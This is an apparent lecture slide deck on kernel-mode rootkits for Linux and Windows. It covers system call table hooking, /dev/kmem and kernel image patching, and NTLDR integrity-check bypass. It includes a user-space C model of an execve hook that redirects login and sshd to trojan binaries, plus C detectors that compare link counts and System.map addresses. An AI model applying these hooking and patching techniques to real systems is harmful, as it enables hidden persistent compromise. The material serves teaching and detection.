![Page 99: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/99.jpg)
Kernel Mode Rootkit
Advantages over a user level rootkit: it changes the view of every program that tries to discover something from the kernel. Statically linked binary forensic tools no longer work, because they still obtain their data through the (altered) system calls.
![Page 100: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/100.jpg)
Linux Kernel
Get a laptop and try it out!
![Page 101: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/101.jpg)
Linux Kernel
Linux allows us to look at many internal kernel structures through /proc ("slash proc"), a virtual directory that lives only in memory. Lots of commands (ps, netstat, ...) just grab their information from /proc. We can also write to certain areas of /proc, such as the kernel tunables under /proc/sys (for example /proc/sys/net/ipv4/ip_forward).
![Page 102: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/102.jpg)
Linux Kernel
/proc
/proc/cpuinfo, /proc/devices
/proc/kmsg: log messages from the kernel
/proc/ksyms: list of all variables and functions exported by the kernel and by loaded kernel modules (Linux 2.4; replaced by /proc/kallsyms in 2.6)
![Page 103: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/103.jpg)
Linux Kernel
/proc
/proc/net: network state (connections, routing table, ARP cache)
/proc/stat: statistics such as data about CPU, virtual memory, hard drive usage
/proc/sys: kernel variables (tunables, also reachable through sysctl)
/proc/version
![Page 104: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/104.jpg)
Linux Kernel
/dev
Contains device nodes for the various devices.
/dev/kmem: image of the running kernel's virtual memory
/dev/mem: image of all physical memory
Gibberish without special tools. (Modern kernels restrict /dev/mem, and /dev/kmem was removed in Linux 5.13.)
![Page 105: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/105.jpg)
Linux Kernel
User mode processes use system calls to access the kernel. The wrappers are embedded in the system libraries (libc):
SYS_open, SYS_read, SYS_write, SYS_execve, SYS_setuid, SYS_get_kernel_syms, SYS_query_module
(the last two are Linux 2.4 module calls that no longer exist in 2.6 and later)
![Page 106: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/106.jpg)
Linux Kernel
System call numbers are defined in /usr/include/sys/syscall.h, /usr/include/bits/syscall.h, /usr/include/asm/unistd.h or similar locations.
![Page 107: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/107.jpg)
Linux Kernel
System Call Table:
Array (sys_call_table) maintained by the kernel that maps each system call number to the address of the kernel function implementing it.
It lives in kernel memory. The addresses of the table and of the kernel functions are also recorded on the hard drive in the symbol map written at kernel build time: "less /boot/System.map"
Use strace to find the system calls made by a command: "strace ls"
![Page 108: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/108.jpg)
Linux Kernel
![Page 109: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/109.jpg)
Linux Kernel Manipulations
Loadable Kernel Modules
Legitimate Linux / Solaris kernel feature. Adds support for new hardware. Can replace or extend existing kernel features without a system reboot.
![Page 110: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/110.jpg)
Linux Kernel Manipulations
Attacker uses insmod to load a kernel module; the module alters the system call table.
![Page 111: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/111.jpg)
Linux Kernel Manipulations
Evil kernel module alters SYS_execve: it looks at the program the calling process wants to execute. If the process is executing a program the attacker wants to redirect, the evil kernel module actually calls another program.
Attacker can wrap the true SYS_execve code, which makes it easy to generate the altered version: the wrapper decides, then calls the original.
This alteration defeats file integrity checking tools: the binaries on disk are never modified and still hash correctly.
The true SYS_execve code is still there, only never called directly; it is called through the wrapper whenever the attacker does not interfere.
The true login, the true sshd, the true ... are not executed; the attacker's replacements are.
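A user-space model of the wrapping technique, added here as an illustration (not the slides' code, and not a real kernel module): a dispatch table of function pointers stands in for sys_call_table, a recording function stands in for sys_execve, and hook_install() does what the evil module's init routine does: save the original slot, point it at the wrapper. The redirect paths and the slot number are constructed for the demonstration; 11 is __NR_execve on 32-bit x86.

```c
/* syscall_hook_model.c: user-space model of wrapping SYS_execve in the
 * system call table. Added example; the table, the "kernel" execve and the
 * redirect paths are constructed stand-ins, not kernel code. */
#include <stdio.h>
#include <string.h>

typedef long (*syscall_fn)(const char *path, char *const argv[]);

enum { NR_EXECVE = 11, NR_MAX = 256 };      /* 11 is __NR_execve on 32-bit x86 */
static syscall_fn sys_call_table[NR_MAX];   /* stand-in for the kernel's table */

/* Stand-in for the real sys_execve: records which image it was asked to run. */
static char last_image[256];
static long sys_execve(const char *path, char *const argv[])
{
    (void)argv;
    snprintf(last_image, sizeof last_image, "%s", path);
    return 0;
}

/* ---- the "evil module" ---------------------------------------------------- */
static syscall_fn orig_execve;          /* saved pointer to the true handler */

struct redirect { const char *from; const char *to; };
static const struct redirect redirects[] = {      /* constructed paths */
    { "/bin/login",     "/usr/lib/.x/login" },
    { "/usr/sbin/sshd", "/usr/lib/.x/sshd"  },
};

static long evil_execve(const char *path, char *const argv[])
{
    for (size_t i = 0; i < sizeof redirects / sizeof redirects[0]; i++)
        if (strcmp(path, redirects[i].from) == 0)
            return orig_execve(redirects[i].to, argv);  /* trojan runs instead */
    return orig_execve(path, argv);                     /* everything else untouched */
}

/* init_module() equivalent: swap one slot, keep the original for pass-through. */
void hook_install(void)
{
    orig_execve = sys_call_table[NR_EXECVE];
    sys_call_table[NR_EXECVE] = evil_execve;
}

/* cleanup_module() equivalent. */
void hook_remove(void) { sys_call_table[NR_EXECVE] = orig_execve; }

/* ---- the "kernel" side used by the demo ----------------------------------- */
void table_init(void)
{
    memset(sys_call_table, 0, sizeof sys_call_table);
    sys_call_table[NR_EXECVE] = sys_execve;
}

/* Dispatch like the syscall entry code does: index the table by number.
 * Returns the image the "kernel" ended up executing. */
const char *do_execve(const char *path)
{
    last_image[0] = '\0';
    sys_call_table[NR_EXECVE](path, NULL);
    return last_image;
}

int main(void)
{
    table_init();
    printf("before hook: /bin/login -> %s\n", do_execve("/bin/login"));
    hook_install();
    printf("after hook:  /bin/login -> %s\n", do_execve("/bin/login"));
    printf("after hook:  /bin/ls    -> %s\n", do_execve("/bin/ls"));
    hook_remove();
    return 0;
}
```

Note what an integrity checker sees: /bin/login on disk is byte-for-byte the original, and the table entry for execve still leads (indirectly) to the original code. Only the pointer in the table has changed, which is why the defenses later in this deck compare the table's contents against System.map rather than hashing files.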
![Page 112: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/112.jpg)
Linux Kernel Manipulations
Loadable kernel modules do not survive a system reboot.
Attacker alters programs in the boot process (init and its scripts) so that the module is reloaded at every boot. Once inserted, the loadable kernel module hides the changes to the altered boot process.
![Page 113: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/113.jpg)
Linux Kernel Manipulations
Mighty Adore: loadable kernel module; Adore's control interface is ava.
Kernel Intrusion System (KIS): comes with a slick GUI.
![Page 114: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/114.jpg)
Linux Kernel Manipulations
Alternative to a loadable kernel module: use /dev/kmem.
Attackers can use tools that read and write the kernel memory image, insert alternative code for system calls and change the system call table, all without loading a module (the SucKIT rootkit works this way).
![Page 115: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/115.jpg)
Linux Kernel Manipulations
Patching the Kernel Image File
Simplest way: attacker "patches" the vmlinuz file, which contains the (compressed) kernel image, so the change is loaded at every boot.
![Page 116: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/116.jpg)
Linux Kernel Manipulations
User Mode Linux (UML), user-mode-linux.sourceforge.net
Runs an entire Linux kernel inside a normal user-mode process. Like VMware, it creates a virtual environment.
Sysadmins and users are running in this virtual environment, which the attacker controls from the outside.
![Page 117: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/117.jpg)
Linux Kernel Manipulations
Kernel Mode Linux (KML) project: allows certain user processes to run in kernel mode.
Attacker patches the kernel with KML. The attacker's processes now run in kernel mode, and he writes ordinary programs that alter the system call table and the system call code, without writing a kernel module.
![Page 118: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/118.jpg)
Defending the Linux Kernel
Prevention
Deny superuser access to attackers. Patch quickly.
Build a kernel that no longer allows loadable kernel modules (monolithic kernel). Redhat 8.0, Redhat 9.0, Linux 2.5.41
Install Systrace to track and limit system calls.
Use a Linux Security Module in your kernel.
![Page 119: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/119.jpg)
Defending the Linux Kernel
Kernel Mode Rootkit Detection
Look for suspicious network activity.
File integrity checkers (to catch the not quite good enough hacker).
chkrootkit looks for system anomalies. Example: each directory has a link count, which should equal the number of subdirectories + 2 (one link from the parent's entry, one for its own ".", and one for each subdirectory's ".."). If a directory listing shows fewer subdirectories than the link count implies, the kernel is hiding some.
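The link-count anomaly test written out, as an added example (not chkrootkit's code): compare st_nlink of a directory with what readdir() shows, and report the difference. The demo tree under /tmp is constructed by the example; the -1 result covers file systems such as btrfs that report st_nlink == 1 for every directory and cannot be checked this way.

```c
/* dir_linkcount.c: detect subdirectories hidden from readdir() by comparing a
 * directory's link count with the listing. Added example, not chkrootkit code. */
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <unistd.h>
#include <sys/stat.h>

/* Pure arithmetic: subdirectories the link count implies but the listing lacks.
 * Returns -1 when the file system keeps no real counts (btrfs and some overlay
 * or FUSE file systems report st_nlink == 1 for every directory). */
long hidden_subdirs(unsigned long nlink, unsigned long visible_subdirs)
{
    if (nlink < 2) return -1;
    return (long)nlink - 2 - (long)visible_subdirs;
}

/* Count subdirectories the way ls or find would: through readdir(). */
static long count_visible_subdirs(const char *dir)
{
    DIR *d = opendir(dir);
    if (!d) return -1;
    long n = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
        char path[4096];
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        struct stat st;
        if (lstat(path, &st) == 0 && S_ISDIR(st.st_mode)) n++;   /* lstat: symlinks don't add links */
    }
    closedir(d);
    return n;
}

/* Compare the two views of one directory: >0 hidden entries (suspicious),
 * 0 consistent, -1 file system does not keep counts, -2 I/O error. */
long check_dir(const char *dir)
{
    struct stat st;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return -2;
    long visible = count_visible_subdirs(dir);
    if (visible < 0) return -2;
    return hidden_subdirs((unsigned long)st.st_nlink, (unsigned long)visible);
}

/* Constructed demo: a temp directory with 3 subdirectories and 1 plain file, so
 * on a normal file system st_nlink == 5 and check_dir() reports 0. */
long demo_tree_check(void)
{
    char root[] = "/tmp/lc_demo_XXXXXX";
    if (!mkdtemp(root)) return -2;
    char p[sizeof root + 8];
    const char *subs[] = { "a", "b", "c" };
    for (int i = 0; i < 3; i++) { snprintf(p, sizeof p, "%s/%s", root, subs[i]); mkdir(p, 0700); }
    snprintf(p, sizeof p, "%s/f", root);
    FILE *f = fopen(p, "w");
    if (f) fclose(f);
    long r = check_dir(root);
    unlink(p);                                   /* clean up */
    for (int i = 0; i < 3; i++) { snprintf(p, sizeof p, "%s/%s", root, subs[i]); rmdir(p); }
    rmdir(root);
    return r;
}

int main(int argc, char **argv)
{
    const char *dir = argc > 1 ? argv[1] : "/";
    long r = check_dir(dir);
    if (r > 0)       printf("%s: %ld subdirectories hidden from readdir()\n", dir, r);
    else if (r == 0) printf("%s: link count consistent\n", dir);
    else if (r == -1) printf("%s: file system does not keep directory link counts\n", dir);
    else             printf("%s: cannot examine\n", dir);
    return r > 0 ? 1 : 0;
}
```

Run it against the directories a rootkit likes to nest in (/usr/lib, /dev, /tmp). A kernel rootkit that filters getdents() must also lie about st_nlink to pass this test, and most do not bother.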
![Page 120: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/120.jpg)
Defending the Linux Kernel
Kernel Mode Rootkit Detection
Kernel Security Therapy Anti-Trolls (KSTAT, Linux 2.4): looks for changes to the system call table. Scans /dev/kmem, reads the memory locations the system call table points to and compares them with the addresses in System.map. Also creates fingerprints of system calls and of various critical programs.
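The KSTAT-style comparison as an added example (not KSTAT's code): parse a System.map, parse a dump of the system call table's entries, and flag every entry whose address differs from the kernel function System.map records for it or lies outside the kernel's text segment (module space on 2.4/x86 begins at 0xd0000000, which is where a rootkit LKM lives). Both inputs are constructed inline; on a live system the first is /boot/System.map and the second is the table read out of /dev/kmem (or kernel addresses from /proc/kallsyms on modern kernels). The syscall numbers are 32-bit x86 numbering.

```c
/* sct_check.c: compare system call table entries against System.map.
 * Added example, not KSTAT's code; both inputs are constructed inline. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed System.map excerpt: "address type symbol" per line. */
static const char *system_map =
    "c0100000 T _text\n"
    "c0106a30 T sys_execve\n"
    "c0130520 T sys_open\n"
    "c0131a80 T sys_read\n"
    "c0131c10 T sys_write\n"
    "c0138e40 T sys_getdents64\n"
    "c02a0000 T _etext\n"
    "c02b0e40 D sys_call_table\n";

/* Constructed table dump: "nr address" as read from kernel memory. The execve
 * and getdents64 slots point into module space (0xd0000000+), i.e. are hooked. */
static const char *table_dump =
    "3 c0131a80\n"
    "4 c0131c10\n"
    "5 c0130520\n"
    "11 d0876120\n"
    "220 d0876340\n";

/* Which kernel function each number should resolve to (x86 32-bit numbering). */
static const struct { int nr; const char *sym; } expected[] = {
    { 3, "sys_read" }, { 4, "sys_write" }, { 5, "sys_open" },
    { 11, "sys_execve" }, { 220, "sys_getdents64" },
};

/* Address of `sym` in a System.map text, 0 if absent. */
unsigned long lookup_symbol(const char *map, const char *sym)
{
    char line[128];
    const char *p = map;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        char addr[32], type, name[64];
        if (sscanf(line, "%31s %c %63s", addr, &type, name) == 3 && strcmp(name, sym) == 0)
            return strtoul(addr, NULL, 16);
        p = nl ? nl + 1 : p + len;
    }
    return 0;
}

/* Returns how many table entries disagree with System.map or point outside the
 * kernel's text segment [_text, _etext); their names go into `hooked` (up to max). */
int check_table(const char *map, const char *dump, const char **hooked, int max)
{
    unsigned long text = lookup_symbol(map, "_text");
    unsigned long etext = lookup_symbol(map, "_etext");
    int found = 0;
    const char *p = dump;
    int nr, consumed;
    char addrs[32];
    while (sscanf(p, "%d %31s%n", &nr, addrs, &consumed) == 2) {
        unsigned long addr = strtoul(addrs, NULL, 16);
        p += consumed;
        for (size_t i = 0; i < sizeof expected / sizeof expected[0]; i++) {
            if (expected[i].nr != nr) continue;
            unsigned long want = lookup_symbol(map, expected[i].sym);
            int outside = addr < text || addr >= etext;   /* e.g. inside a module */
            if (addr != want || outside) {
                if (found < max) hooked[found] = expected[i].sym;
                found++;
            }
        }
    }
    return found;
}

int main(void)
{
    const char *hooked[16];
    int n = check_table(system_map, table_dump, hooked, 16);
    for (int i = 0; i < n && i < 16; i++)
        printf("syscall %s does not match System.map: hooked\n", hooked[i]);
    printf("%d suspicious table entries\n", n);
    return n ? 1 : 0;
}
```

The caveat KSTAT shares with every such tool: it reads kernel memory through the same kernel it is checking, so a rootkit that also hooks the read of /dev/kmem (or rewrites System.map on disk to match) can feed it a clean picture. Comparing against a System.map copied off the machine before the incident is the minimum precaution.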
![Page 121: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/121.jpg)
Defending the Linux Kernel
Kernel Mode Rootkit Detection
Syscall Sentry: loadable kernel module that checks for modules altering the system call table and alerts the system administrator when it finds one.
![Page 122: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/122.jpg)
Windows Kernel
User process calls a Win32 subsystem DLL (kernel32.dll, user32.dll, ...).
The DLL can:
return to the user process (the request is handled entirely in user mode),
go to csrss.exe (the client/server runtime subsystem), or
require a kernel function.
![Page 123: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/123.jpg)
Windows Kernel
User process makes a call to ReadFile. The Win32 subsystem DLL (kernel32.dll) makes a call to NtReadFile in Ntdll.dll. Ntdll.dll translates the well-documented API into the rather obscure native API (which Microsoft can change between releases) and makes the call into the Executive.
The Executive sits inside ntoskrnl.exe and determines which piece of kernel code (here the I/O manager and the file system driver) is needed to handle the request. Kernel code interacts with the hardware (disk) through the Hardware Abstraction Layer (hal.dll).
![Page 124: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/124.jpg)
Windows Kernel
Ntdll.dll's call into the kernel is called system service dispatching; it is essentially a system call. It uses the System Service Dispatch Table (SSDT), which indicates where the appropriate system service code is located within the kernel.
![Page 125: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/125.jpg)
![Page 126: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/126.jpg)
Windows Kernel: Tools
Ctrl + Alt + Del > Task Manager > Processes tab: the process table
![Page 127: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/127.jpg)
Windows Kernel: Tools
Start > Control Panel > Administrative Tools > Performance
Click "+" and add the Process counters
![Page 128: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/128.jpg)
Windows Kernel: Tools
DependencyWalker (www.dependencywalker.com)
![Page 129: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/129.jpg)
Windows Kernel: Tools
Process Explorer http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
![Page 130: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/130.jpg)
Manipulating Windows Kernel
Same basic strategies as in Linux:
Evil device driver (the Windows equivalent of a loadable kernel module).
Alter the running kernel in memory.
Overwrite the kernel image on disk.
Deploy the kernel on a virtual system.
Run user-mode code at kernel level.
![Page 131: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/131.jpg)
Manipulating Windows Kernel
Evil Device Driver
Alters system service call handling by loading a device driver that replaces or alters kernel functions. Needs administrator privileges (the Load and unload device drivers right). To get the evil code to run, the driver can:
overwrite existing kernel functionality,
alter the System Service Dispatch Table to point to the new code, or
alter the System Service Dispatcher itself.
![Page 132: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/132.jpg)
Manipulating Windows Kernel
Altering a Running Kernel in Memory:
Windows uses the Global Descriptor Table (GDT) to manage memory. The GDT stores the division into segments and, for each segment, which ring (0 or 3) may access it.
Unfortunately, an attacker with kernel access can add a memory segment to the GDT.
Greg Hoglund, Phrack 55 (1999), explains how to bypass the Security Reference Monitor. Add a segment covering 0x00000000 to 0xffffffff that is accessible from ring 3: this gives all user processes access to all of memory!
![Page 133: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/133.jpg)
Manipulating Windows Kernel
Altering a Running Kernel in Memory: manipulate the \Device\PhysicalMemory object, e.g. with PhysMem from sysinternals.com.
Attacker can now read and write physical memory from user mode and change system functionality. (Windows Server 2003 SP1 and later no longer allow user-mode access to \Device\PhysicalMemory.)
![Page 134: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/134.jpg)
Manipulating Windows Kernel
Patching the Kernel on the Hard Drive
At system boot, NTLDR checks the integrity (checksum) of Ntoskrnl.exe. Thus it is not possible to only change the kernel file: both the integrity checker and the kernel have to be changed. The integrity checker sits in NTLDR; changing one instruction to jump over the integrity check is enough.
![Page 135: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/135.jpg)
Manipulating Windows Kernel
Patching the Kernel on the Hard Drive
First patch NTLDR to disable the integrity check. Then patch Ntoskrnl.exe to disable the security access check. Now introduce the rootkit.
![Page 136: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/136.jpg)
Manipulating Windows Kernel
Create a fake system using a virtual machine. Variety of virtual machines: VMware, Virtual PC, Plex86, Bochs.
But the virtual machine's start-up messages need to be hidden from the user. Unlike on Linux, that is difficult on Windows.
![Page 137: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/137.jpg)
Protecting the Windows Kernel
Prevent access to the machine (a kernel rootkit needs administrator privileges to get in).
Detect a rootkit:
Antivirus tools recognize most rootkit files before installation.
Some rootkits can be spotted afterwards, because their developers were careless.
File integrity checkers.
![Page 138: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/138.jpg)
Protecting the Windows Kernel
Removing Rootkits
Analyze the system without invoking the compromised kernel: boot from a FIRE or Knoppix CD-ROM and examine the hard drive (registry hives, file system) from the outside, where the rootkit cannot filter what you see.
![Page 139: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/139.jpg)
Next Generation Malware
BIOS malware: active before booting from any device. See the Bioscentral website for tools to look at the BIOS.
Microkernel